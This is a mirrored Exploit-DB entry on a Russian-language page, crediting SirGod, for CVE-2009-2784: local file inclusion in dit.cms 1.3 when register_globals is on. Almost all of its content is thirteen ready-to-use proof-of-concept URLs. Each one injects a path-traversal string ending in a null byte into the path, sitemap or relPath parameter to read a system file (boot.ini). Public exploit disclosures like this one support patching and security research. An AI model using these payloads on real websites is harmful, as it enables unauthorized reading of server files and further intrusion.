- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9310
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2784
- Дата публикации
- 2009-07-30
Код:
##########################################################################################################
[+] dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##########################################################################################################
[+] Homepage : http://ditcms.org/
[+] Local File Inclusion
- Note : register_globals = on
- Vulnerable code is everywhere
- PoC's
http://127.0.0.1/path/install/index.php?path=../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/left_rightslideopen/index.php?path=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/left_rightslideopen/index.php?sitemap=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/side_pullout/index.php?sitemap=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/side_pullout/index.php?path=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/side_slideopen/index.php?path=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/side_slideopen/index.php?sitemap=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/simple/index.php?path=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/top_dropdown/index.php?path=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/top_dropdown/index.php?sitemap=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/topside/index.php?sitemap=../../../../../../../../boot.ini%00
http://127.0.0.1/path/menus/topside/index.php?path=../../../../../../../../boot.ini%00
http://127.0.0.1/path/index/index.php?relPath=../../../../../../boot.ini%00
##########################################################################################################
# milw0rm.com [2009-07-30]- Источник
- www.exploit-db.com
